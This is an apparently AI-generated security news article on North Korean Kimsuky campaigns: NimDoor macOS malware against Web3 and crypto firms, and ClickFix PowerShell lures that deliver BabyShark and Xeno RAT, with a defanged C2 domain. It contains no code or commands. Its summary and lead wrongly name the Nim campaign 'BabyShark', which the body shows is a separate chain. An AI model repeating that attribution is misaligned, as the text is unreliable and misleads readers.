Ethical Hacking News
North Korean hackers have launched a sophisticated campaign targeting Web3 and cryptocurrency businesses with malware written in the Nim programming language. The attack, dubbed "BabyShark," utilizes social engineering tactics and employs novel persistence mechanisms to evade detection. The campaign is notable for its swift adoption of new techniques, often integrating them with script-based mechanisms. As Kimsuky continues to evolve its TTPs, it's essential for businesses in the Web3 space to remain vigilant and implement robust cybersecurity measures to prevent similar attacks.
North Korean hackers have been targeting Web3 and cryptocurrency-related businesses with malware written in Nim programming language.The threat actors' tactics, techniques, and procedures (TTPs) demonstrate a constant evolution of their strategies.A novel persistence mechanism using SIGINT/SIGTERM signal handlers was employed by the threat actors.Social engineering tactics were used to trick targets into opening malicious files or running script updates.A C++ loader called InjectWithDyldArm64 was used to establish communication with a remote server and fetch commands.The malware proceeded to gather system information, run arbitrary commands, and change the current working directory.Trojan1_arm64 was capable of downloading additional payloads to harvest credentials and extract data from web browsers.A collection of Nim-based executables was used as a launchpad for CoreKitAgent, which monitors user attempts to kill the malware process.
In a recent surge of cyber threats, North Korean hackers have been observed targeting Web3 and cryptocurrency-related businesses with malware written in the Nim programming language. The threat actors' tactics, techniques, and procedures (TTPs) demonstrate a constant evolution of their strategies, underscoring the ongoing need for robust cybersecurity measures.
According to SentinelOne researchers Phil Stokes and Raffaele Sabato, the threat actors employed a process injection technique and remote communications via wss, the TLS-encrypted version of the WebSocket protocol. This novel persistence mechanism takes advantage of SIGINT/SIGTERM signal handlers to install persistence when the malware is terminated or the system rebooted.
The cybersecurity company is tracking the malware components collectively under the name NimDoor. Interestingly, some aspects of the campaign were previously documented by Huntabil.IT and later by Huntress and Validin, but with differences in the payloads deployed.
The attack chains involve social engineering tactics, approaching targets on messaging platforms like Telegram to schedule a Zoom meeting via Calendly, an appointment scheduling software. The target is then sent an email containing a supposed Zoom meeting link along with instructions to run a Zoom SDK update script to ensure that they are running the latest version of the videoconferencing software.
This step results in the execution of an AppleScript that acts as a delivery vehicle for a second-stage script from a remote server, while ostensibly redirecting the user to a legitimate Zoom redirect link. The newly downloaded script subsequently unpacks ZIP archives containing binaries responsible for setting up persistence and launching information-stealing bash scripts.
At the heart of the infection sequence is a C++ loader called InjectWithDyldArm64 (aka InjectWithDyld), which decrypts two embedded binaries named Target and trojan1_arm64. InjectWithDyldArm64 launches Target in a suspended state and injects into it the trojan1_arm64's binary code, after which the execution of the suspended process is resumed.
The malware proceeds to establish communication with a remote server and fetch commands that allow it to gather system information, run arbitrary commands, and change or set the current working directory. The results of the execution are sent back to the server.
Trojan1_arm64, for its part, is capable of downloading two more payloads, which come fitted with capabilities to harvest credentials from web browsers like Arc, Brave, Google Chrome, Microsoft Edge, and Mozilla Firefox, as well as extract data from the Telegram application.
Also dropped as part of the attacks is a collection of Nim-based executables that are used as a launchpad for CoreKitAgent, which monitors for user attempts to kill the malware process and ensures persistence. This behavior ensures that any user-initiated termination of the malware results in the deployment of the core components, making the code resilient to basic defensive actions.
Genians noted that the attackers tried to trick the target into opening a manual and entering an authentication code, supposedly required to access a secure document. While the original 'ClickFix' tactic tricked users into clicking to fix a specific error, this variant modified the approach by prompting users to copy and paste an authentication code to access a secure document.
A similar tactic was documented by Proofpoint in April 2025, with the difference being that the email message claimed to originate from a Japanese diplomat and urged the recipient to set up a meeting with the Japanese ambassador to the United States.
Once the obfuscated malicious PowerShell command is executed, a decoy Google Docs file is used as a distraction to conceal the execution of malicious code that establishes persistent communication with a C2 server to collect data and deliver additional payloads.
A second variant of the ClickFix strategy entails using a fake website mimicking a legitimate defense research job portal and populating it with bogus listings, causing site visitors who click on these postings to be served with a ClickFix-style pop-up message to open the Windows Run dialog and run a PowerShell command.
The command, for its part, guided users to download and install the Chrome Remote Desktop software on their systems, enabling remote control over SSH via the C2 server "kida.plusdocs.kro[.]kr." Genians discovered a directory listing vulnerability in the C2 server that publicly exposed data likely collected from victims located across South Korea.
The C2 server also included an IP address from China, which has been found to contain a keylogging record for a Proton Drive link hosting a ZIP archive that's used to drop BabyShark malware on the infected Windows host by means of a multi-stage attack chain.
As recently as last month, Kimsuky is believed to have concocted yet another variant of ClickFix in which the threat actors deploy phony Naver CAPTCHA verification pages to copy and paste PowerShell commands into the Windows Run dialog that launches an AutoIt script to siphon user information.
"The 'BabyShark' campaign is known for its swift adoption of new attack techniques, often integrating them with script-based mechanisms," the company said. "The 'ClickFix' tactic discussed in this report appears to be another case of publicly available methods being adapted for malicious use."
In recent weeks, Kimsuky has also been linked to email phishing campaigns that seemingly originate from academic institutions, but distribute malware under the pretext of reviewing a research paper.
According to AhnLab, the attacks begin with spear-phishing emails with compressed archive attachments containing a Windows shortcut (LNK) file, which is likely used to drop a PowerShell script that then downloads and launches the decoy document, as well as executes Xeno RAT and a PowerShell information stealer.
Other attack sequences have been found to utilize a PowerShell-based downloader that fetches a file with an RTF extension from Dropbox to ultimately launch Xeno RAT. The campaign shares infrastructure overlaps with another set of attacks that delivered a variant of Xeno RAT known as MoonPeak.
"The attacker managed not only the malware used in attacks but also uploaded and maintained infected system log files and exfiltrated information in private repositories using GitHub Personal Access Tokens (PAT)," ENKI noted. "This ongoing activity highlights the persistent and evolving nature of Kimsuky's operations, including their use of both GitHub and Dropbox as part of their infrastructure."
Kimsuky, per data from NSFOCUS, has been one of the most active threat groups from Korea, alongside Konni, accounting for 5% of all the 44 advanced persistent threat (APT) activities recorded by the Chinese cybersecurity company in May 2025. In comparison, the top three most active APT groups in April were Kimsuky, Sidewinder, and Konni.
Related Information:
https://www.ethicalhackingnews.com/articles/North-Korean-Hackers-Launch-Sophisticated-Nim-Malware-Campaign-Targeting-Web3-and-Cryptocurrency-Businesses-ehn.shtml
https://thehackernews.com/2025/07/north-korean-hackers-target-web3-with.html
https://www.bleepingcomputer.com/news/security/north-korean-hackers-adopt-clickfix-attacks-to-target-crypto-firms/
Published: Wed Jul 2 14:52:02 2025 by llama3.2 3B Q4_K_M
